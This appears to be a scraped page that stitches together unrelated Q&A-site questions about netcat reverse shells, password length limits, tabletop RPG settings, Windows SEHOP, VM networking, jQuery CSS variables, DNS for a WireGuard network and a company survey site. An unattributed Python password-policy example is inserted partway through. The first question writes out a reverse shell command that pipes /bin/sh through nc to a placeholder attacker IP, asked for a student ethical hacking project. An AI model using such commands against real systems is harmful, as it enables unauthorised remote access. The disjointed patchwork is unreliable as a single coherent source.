Setting up netcat session over the internet [closed]

I am a student working on an ethical hacking project.

How do I set up a netcat session over the internet? My project requires us to use a public service like AWS or DigitalOcean as the victim machine and my own PC as the attacker machine. I tried the following commands:

Attacker’s machine running the latest Kali 2020.3 (Tried NAT VM setup and live booting too):

nc -nlvp 5555

Victim’s machine running Ubuntu 18.04.5:

/bin/sh | nc <PUBLIC IP OF ATTACKER's MACHINE> 5555 

But it just does not open a reverse shell on the attacker’s machine. Did I miss anything?

Is there any security risk in not setting a maximum password length?

I’m a listener of the podcast "Security Now" where Steve Gibson, a security expert, often claims that there are no reasons to limit the number of characters a user can use in their passwords when they create an account on a website. I have never understood how it is even technically possible to allow an unlimited number of characters and how it could not be exploited to create a sort of buffer overflow.

I found a related question here, but mine is slightly different. The author of the other question explicitly mentions in their description that they understand why setting a maximum length of 100000000 characters would be a problem. I actually want to know why it would be a problem, is it like I have just said because of buffer overflows? But to be vulnerable to a buffer overflow, shouldn’t you have a sort of boundary which you can’t exceed in the first place, and thus if you didn’t limit the number of characters, would you even have this risk? And if you are thinking about starving a computer’s RAM or resources, could even a very large password be a problem?

So, I guess it is possible not to limit the number of characters in a password: all you’d have to do would be to not use the maxlength attribute or not have a password validation function on the server side. Would that be the secure way to do it? And if it is, is there any danger in allowing an unlimited number of characters for your passwords? On the other hand, NIST recommends that developers limit passwords to 256 characters. If they take the time to recommend a limitation, does it mean there has to be one?
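As an added example, not from the post above, here is a length policy in the spirit of NIST SP 800-63B together with the failure mode an explicit cap guards against. The 256-byte cap and the 16-byte salt are assumptions chosen for the demo (NIST only requires that at least 64 characters be accepted); the check is on the NFKC-normalised UTF-8 bytes, because that is what the KDF actually consumes. The second pair of functions emulates a KDF that silently truncates its input, as bcrypt does at 72 bytes: without an application-level limit, two different long passwords hash to the same value, which is why the usual fix is to rejec over-long input and, for bcrypt in particular, to pre-hash.

```python
"""Added example (not from the original post): explicit password length
policy plus an emulation of a truncating KDF.  MAX_BYTES, the salt size
and the iteration counts are demo assumptions."""
import hashlib
import hmac
import os
import unicodedata
from typing import Optional, Tuple

MIN_CHARS = 8
MAX_BYTES = 256        # assumption: generous cap, well above NIST's 64-char floor
TRUNCATE_AT = 72       # bcrypt's input limit, emulated in truncating_kdf()
SALT_LEN = 16


def normalize(password: str) -> bytes:
    """NFKC-normalise then UTF-8 encode so the same visible password always
    yields the same bytes and the length check applies to those bytes."""
    return unicodedata.normalize("NFKC", password).encode("utf-8")


def check_policy(password: str) -> Tuple[bool, str]:
    """Return (accepted, reason).  Note a 70-character emoji password is
    280 bytes, so the byte-level cap can trip before a character count."""
    if len(password) < MIN_CHARS:
        return False, "too short"
    if len(normalize(password)) > MAX_BYTES:
        return False, "too long"
    return True, "ok"


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = 600_000) -> bytes:
    """PBKDF2-HMAC-SHA256 (stdlib) over the normalised bytes.  The policy
    runs first, so the KDF never sees unbounded input from the network."""
    ok, reason = check_policy(password)
    if not ok:
        raise ValueError(reason)
    salt = os.urandom(SALT_LEN) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", normalize(password), salt, iterations)
    return salt + digest


def verify_password(password: str, stored: bytes, iterations: int = 600_000) -> bool:
    """Constant-time comparison; a policy-violating candidate fails fast."""
    if not check_policy(password)[0]:
        return False
    salt, digest = stored[:SALT_LEN], stored[SALT_LEN:]
    candidate = hashlib.pbkdf2_hmac("sha256", normalize(password), salt, iterations)
    return hmac.compare_digest(candidate, digest)


def truncating_kdf(password: str, salt: bytes, iterations: int = 1000) -> bytes:
    """Emulates a bcrypt-like KDF: bytes past TRUNCATE_AT are ignored."""
    return hashlib.pbkdf2_hmac("sha256", normalize(password)[:TRUNCATE_AT], salt, iterations)


def prehashed_kdf(password: str, salt: bytes, iterations: int = 1000) -> bytes:
    """Pre-hash so the KDF input is always 64 ASCII hex bytes (under 72)
    and every byte of the password still influences the result.  Hex rather
    than raw digest bytes because bcrypt stops at the first NUL byte."""
    prehash = hashlib.sha256(normalize(password)).hexdigest().encode("ascii")
    return hashlib.pbkdf2_hmac("sha256", prehash[:TRUNCATE_AT], salt, iterations)
```

`check_policy` is the answer to "how can unlimited length be a problem": the KDF cost and memory are bounded by what reaches it, so the cap is set where input is validated, not left to a silent truncation inside the hash function.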

How do I make players more comfortable in an unusual historical setting?

I run a lot of games/write systems set in specific historical/cultural contexts, because I like rpgs as a way to explore them and think they provide a great sense of place. However, I tend not to choose more well-known settings, like WWII Europe or Victorian England, because they’ve already been so thoroughly explored that they lose some of the uniqueness factor I’m interested in.

So far the people I’ve played/playtested them with have been enthusiastic about the ideas, but the games tend to start slow as they are hesitant to be creative because they don’t want to ‘be wrong’ about how things would work in that time and place. However, I’m not so much set on perfectly replicating, say, 19th century Hong Kong in a given game as I am interested in seeing the game evolve from an off-beat starting point.

Do people think the best solution to this is to separate the actual history from the game history (i.e. emphasize that this is an alternate universe and they can feel free to depart as much as they want to from the historical details) or to provide a lot of background information to ground them as much as possible in the time period so that they’re more comfortable there?

Windows Exploit Protection: what is SEHOP setting: “TelemetryOnly” for?

I’m reading up on the different exploit protection methods from MS. One is SEHOP; if I check it, e.g. with PS:

Get-ProcessMitigation -System

I get:

    Enable                             : NOTSET
    TelemetryOnly                      : OFF
    Audit                              : NOTSET
    Override SEHOP                     : False

What is "TelemetryOnly"? Internet search was not successful so far.

Thanks for hints and resources!

Is there a plausible explanation for a large number of armed adventurers in a fantasy RPG setting?

I’m working on a Dungeons & Dragons setting. I’m looking for a comprehensive and logical explanation why, in a feudal society similar to Western Europe in the Middle Ages, there might be bands of armed adventurers (both male and female) wandering the country, slaying monsters, and frequenting taverns.

Does it follow that if you introduce magic and monsters guarding dungeons filled with treasure into a historical medieval setting, you’ll see an adventuring class emerge? Have there been any real world analogues to an “adventuring class” (obviously without the monsters and magic)?

In setting up a VM, does the Bridged or NAT configuration provide more separation security?

I am setting up a few VMs (assume VB w/ Linux). They will all be on the same PC host (assume Linux) and the intent is to have all the VMs handle separate functions (business, personal finance, and fuck off time) and have no connection to each other through the network or otherwise. I want to set them up in a way that creates the best security as far as separation from each other and the host. The host will function only to host the VMs. I would prefer to use one VPN subscription, which has been purchased anonymously. However, if this compromises the separation of these VMs, then I would consider changing the approach.

So, the question here is, given this setup, which method (Bridged or NAT) would work better as far as providing the least amount of leaked information between the VMs/host?

Additional information:

The plan is to set up software firewalls allowing only outgoing connections for the VMs and the host. I am still looking into whether this is the best approach (secure and user-friendly).

Any other board allowable suggestions would also be appreciated.

Getting and setting CSS variables with JQuery in WordPress backend fails

On a WordPress settings page of a plugin I develop, I have to implement a visual element that I want to change by JavaScript. I’ve got my solution working as it should and tested it on CodePen and JSFiddle. But when loading the equivalent code including the script, it will not work.

Here is the schema I’m using:

HTML

    <div id="origin" class="box"></div>
    <div id="target" class="box"></div>
    <button id="toggle-color">Toggle Color</button>

CSS

    :root {
      --origin-color: red;
      --target-color: blue;
    }

    .box {
      width: 150px;
      height: 150px;
    }

    #origin {
      background-color: var(--origin-color);
    }

    #target {
      background-color: var(--target-color);
    }

JS (jQuery 3.4.1)

    (function ($) {
      'use strict';

      $(document).ready(function () {
        $('#toggle-color').on('click', function (event) {
          event.preventDefault();
          var root = $(':root');
          var origin_color = '--origin-color';
          var target_color = '--target-color';
          // .css() reads and writes custom properties only on jQuery 3.2 or newer;
          // older builds return undefined for a '--name' property
          var origin_value = root.css(origin_color);
          var target_value = root.css(target_color);
          root.css(origin_color, target_value);
          root.css(target_color, origin_value);
          return false;
        });
      });

    })(jQuery);

The problem I have is that, while it is working in the test environments, in the WordPress backend the lines where I fetch the colors with

    var origin_value = root.css(origin_color);
    var target_value = root.css(target_color);

return ‘undefined’, so the next line where I switch the colors fails.

See my example here: https://jsfiddle.net/tomybyte/hvbc3zu1/6/

I don’t understand why it is working in JSFiddle and CodePen but not when loading in WordPress (yes, the code is loaded, I checked that!).

Is there a security vulnerability in setting a public DNS entry to a private IP Address?

I recently set up a wireguard server-network configuration with a home server and client devices. I have one main domain that I hope to route everything through via subdomains (in this example, abc.domain.com, def.domain.com, etc.). I hope to use nginx to do this routing.

Is it possible/secure/recommended to register a private IP address (specifically that of my home server within the wireguard network, i.e. 10.27.0.1/24) in a public DNS (e.g. Google DNS), so that if you run ping abc.domain.com you would get back 10.27.0.1? I found a few questions that come close to this one (this one covers private IPs in public DNS for MX records, this one talks about having A records without much mention of VPN), and the overall picture I get from these links is that it is possible, but not technically perfect, since a hacker gets a small piece of info about your local network (the wireguard network is 10.27.0.1/24). Isn’t this a relatively moot point given it’s behind wireguard, assuming I have all of the usual safety checks in place (no remote ssh (root or otherwise) unless on the wireguard network, fail2ban, no password authentication for ssh, etc.)?

This IP (10.27.0.1) would be only accessible through the wireguard network, so I don’t think it would expose the services to the internet. I want to do this so that I don’t have to set up local DNS entries on each device, as I don’t believe this is possible on a phone, and it would be ideal to make one change [i.e. set the DNS entry to 10.27.0.1] and then have each device just run a simple DNS query for abc.domain.com. This would also have the added benefit of only opening the wireguard port, and keeping the firewall closed for 80 + 443.

A corollary of this question is how best do you manage certs/SSL if this is possible? I managed to get certbot working by temporarily exposing port 80 on my server to acquire the certs for abc.domain.com, and then closing 80 to only access the webserver via wireguard through the wireguard port + nginx. I can already see one downside to this method – having to manually open port 80 every time certbot wants to get new certificates (I believe by default this is every 60 days). I understand that wireguard is approximately as secure as SSL/HTTPS, but for my personal OCD I would prefer to have the connection secured through https on top of wireguard. I’m somewhat iffy on the details of managing certs for wildcards, but could I do it with my main domain.com (that is pointing to an internet-facing site) and have it propagate to the subdomains, allowing it to be renewed through that? (this question seems to indicate so)

My goal long term is to expand this into a network that includes family/close friends as a type of ‘intranet’ for sharing photos and using other self-hosted services.

My nginx config file (abc.conf) looks something like this:

    server {
        server_name abc.domain.com;
        # DNS entry of abc.domain.com is 10.27.0.1, which is the local IP for the wireguard network
        # SHOULD NOT be accessible outside of wireguard network

        location / {
            proxy_pass http://127.0.0.1:8000; # Redirects to local service on port 8000
        }

        listen [::]:443 ssl; # managed by Certbot
        listen 443 ssl; # managed by Certbot

        # SSL certs provided by certbot [removed manually]
        # .
        # .
        # .
    }

How can I outfit the Caves of Chaos to fit contextually with the Dragonlance setting?

I have been tasked with running a game of The Keep on the Borderlands adventure module, however, I want to have a campaign in the Dragonlance setting, in the age of mortals.

As the characters will be starting in the City of Solace, without other advisement I plan to put the "Caves of Chaos" (location from the adventure module) in the Kharolis Mountains.

Now the question I am faced with, what races / creatures should I put in the caves, and what is their motivation or reason for being there that would be consistent with the Dragonlance setting?

Reading through The Keep on The Borderlands, the most apparent roadblock (among others) is that Orcs and Kobolds are not in the Dragonlance setting. I am looking for clarity on what would appropriately fill such a cavern that could motivate adventurers to explore/root out the area.

Setting Up Private Employee Survey Area On Company Website [closed]

Long-time listener, first-time caller.

Our company has about 120 employees and growing. We are at a point where we need to collect self-evaluations and other survey data from our workforce, but only our administrators and managers have user accounts with our Google Apps (because those costs add up!). Since we can’t require anyone to have a personal Google account, we don’t have a reliable way to verify or authenticate the rest of our employees as they fill out surveys. Our solution so far is to hand out paper forms and do the data entry manually.

I’ve been charged with finding a solution. I was thinking it’d be possible to set up a member area of sorts on our website where employees could register and log in for surveys and such. I could get Google Sheets talking to the survey database and we’d be off to the races.

Our public-facing site is hosted on SquareSpace, if that makes any difference.

Anyway, the world has changed many times over since I’ve had anything to do with the back end of a website (it’s true; I’m not a pro) and I’m completely unsure of where to start, but I can probably build it once I get my bearings so I’m here looking for suggestions on how to start.

Help?